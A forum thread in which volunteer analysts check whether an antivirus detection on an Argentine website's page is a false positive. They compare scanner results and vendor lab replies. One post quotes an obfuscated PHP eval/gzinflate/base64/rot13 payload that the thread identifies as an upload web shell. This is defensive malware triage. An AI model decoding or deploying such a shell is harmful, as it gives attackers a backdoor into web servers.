Need to check if some URL have a false positive

[REDACTED]

Can anybody check yhr following in order to check a false positive.

URL: http://www.psa.com.ar/usuarios/novedades
Infección: PHP:BackDoor-CB [Trj]
Proceso: C:\Program Files\Google\Chrome\Application\chrome.exe

Regards,
Gustavo Oga
Buenos Aires
Argentina

[Pondus]

html scan
https://www.virustotal.com/nb/file/75d0705a50b16cc3a15e77d3e4302291bb8026fba5b0dc9af055499938dc19f3/analysis/1441405950/

only avast detect

https://sitecheck.sucuri.net/results/www.psa.com.ar/usuarios/novedades

Sucuri blog / PHP backdoors  https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html


i will see if i can get it confirmed from other labs ...

[polonus]

Do a Quttera scan and you will see the PHP malware.
-/usuarios/novedades
Severity:   Malicious
Reason:   Detected malicious PHP content
Details:   Detected malicious PHP content
Offset:   15914

Code: [Select]

[[eval (gzinflate(base64_decode(str_rot13("ML/EF8ZjRZnsUrk/hVMOJaQZS19pZ3kkVNtX06qEFgnxAct0bH2RGin/zljgT/c2q9^^/iih+BI40TaSguWq98TXxc4k0pOiufqT+K7WvibboK8kxCfTyZ6IddrWcAV5mKhyANXlg0FkNPkJ2wTHUTrlQtoJHUjjyFGycunTqKtI8lnvzPLRJ^^DT6ZEPUoIKJWkYyewYRFaJxt+epn6S0qs39+umDuTfsEJnSmd3HRWTkCv/WgX54K4g98833KBSUHXv/Ygqsr+k4USOENPRjxM/ZkaAk56eYDM0xJ5^^sK552h1khNHKr2lIXpZOhYvSs2VHZh8O8oKbPibYUutxFLYKpCY2KCo8Y7ByDy6D0l8="))));]]
Reported to Avast, so no FP.
Vuln.: -http://www.domxssscanner.com/scan?url=http%3A%2F%2Fwww.psa.com.ar -> -: //s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5303bb29505f7875 etc.
uMatrix has prevented the following page from loading:
-http://s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5303bb29505f7875

polonus

[jefferson sant]

when trying to access the home page received another notification
avast, in a moment did not show more

hxxp: //www.psa.com.ar/ JS:includer-BIW [Trj]

see the screenshot attached.

[polonus]

Hi jefferson sant,

That is what Avast detects there and there are only 2 AV to detect this. Detection has been found to be FP-prone, so we have to establish we see real malicious code here.
 I found traces also of adblock circumventing code, so there might be a reason for it to be flagged.
Another example of a similar detection was seen here: https://api.vtapi.net/hu/file/6d2f3a59492223018e34c219832936457634a0220bab861d29bc3ffb55aeacf1/analysis/

The PHP malcode Quttera came up with is being discussed here: https://www.byte.nl/blog/analysis-of-http-posted-php-malware
Where Avast also blocks: http://ddecode.com/phpdecoder/?results=Backdoor -CB[Trj] for the deobfuscation. *
At various analysis sites I get the same Avast result. * PHP Syntax Check: Parse error: syntax error, unexpected ';', expecting ']' in your code on line 1

polonus (volunteer website security analyst and website error-hunter)

polonus

[Pondus]

novedades.htm
https://www.virustotal.com/nb/file/eec5e6e5cee497b13c467684ad36217fbc294860fe0fa39a44179901bb550dc2/analysis/1441477265/


Message from F-Secure lab
==============================================
The file you submitted is clean. It is not malicious. No detection needed.
==============================================

[polonus]

I am still stuck with this report, code won't go away.
Re; http://quttera.com/detailed_report/www.psa.com.ar
I get Redirections:
HTTP Status Code: 500 Server Unavailable
Content Size: 0 bytes
Content Type: no/content
IP Address: 200.16.135.151
Country: Argentina
Web Server:
Netcraft does not like that IP: http://toolbar.netcraft.com/site_report?url=http://200.16.135.151
a meagre 4/100 green...

polonus

[Pondus]

I am still stuck with this report, code won't go away.
Re; http://quttera.com/detailed_report/www.psa.com.ar

quttera code scan
https://www.virustotal.com/nb/file/b9fbbb67a433390579f9900fb4cf6171696ccc1b2f7b2710bc6483a52ec0b39e/analysis/1441488052/

[polonus]

Hi Pondus,

But here is the same PHP shell code, which is flagged the same by Avast: -https://www.google.pl/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&cad=rja&uact=8&ved=0CEkQFjAFahUKEwiek8a-_uDHAhXGWhQKHRSfAJM&url=http%3A%2F%2Fwww.pakteenleets.net%2F2014%2F10%2Fsmall-upload-shell-php.html&usg=AFQjCNGPqwdFdrSRs-T3i7zxmpyU0rR9hg
Exactly what Quttera gives under view code!

Or the gzinflate recursively coded PHP shell must be benign - a FP on the compressed rot13 code?

pol

[Pondus]

and that one is detected
https://www.virustotal.com/nb/file/e05fc0d660252ed3b76fdba22db0c723677f7c11da54c77297a4280091286752/analysis/1441570049/

there is a slight difference at the beginning and ending of the code

Code: [Select]

sample 1 = [[eval    and end with  "))));]]
sample 2 = <?php eval  and end with  ")))); ?>

EDIT: after looking closers there is also some minor code changes in the middel of the code
if the code was exactely identical, should not MD5 be the same?

[Pondus]

Message fom BlueCoat lab ....

the one sample that was detected, got auto added signature whan i uploaded it

========================================================================================
For your kind information, the undetected sample has the same characteristics and behavior with the detected script. Therefore, detections
have been added for both samples.
========================================================================================